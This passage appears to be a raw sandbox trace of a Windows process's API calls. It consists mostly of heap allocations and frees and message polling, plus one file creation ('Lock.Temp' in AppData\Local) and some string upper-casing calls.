wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0200.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0200.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0200.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0200.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0200.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Temp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0200.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0200.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0200.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0200.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0200.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0200.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0200.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0200.305] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0200.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0200.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0200.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0200.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0200.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0200.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0200.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0200.315] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0200.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0200.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0200.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0200.317] RtlAllocateHeap 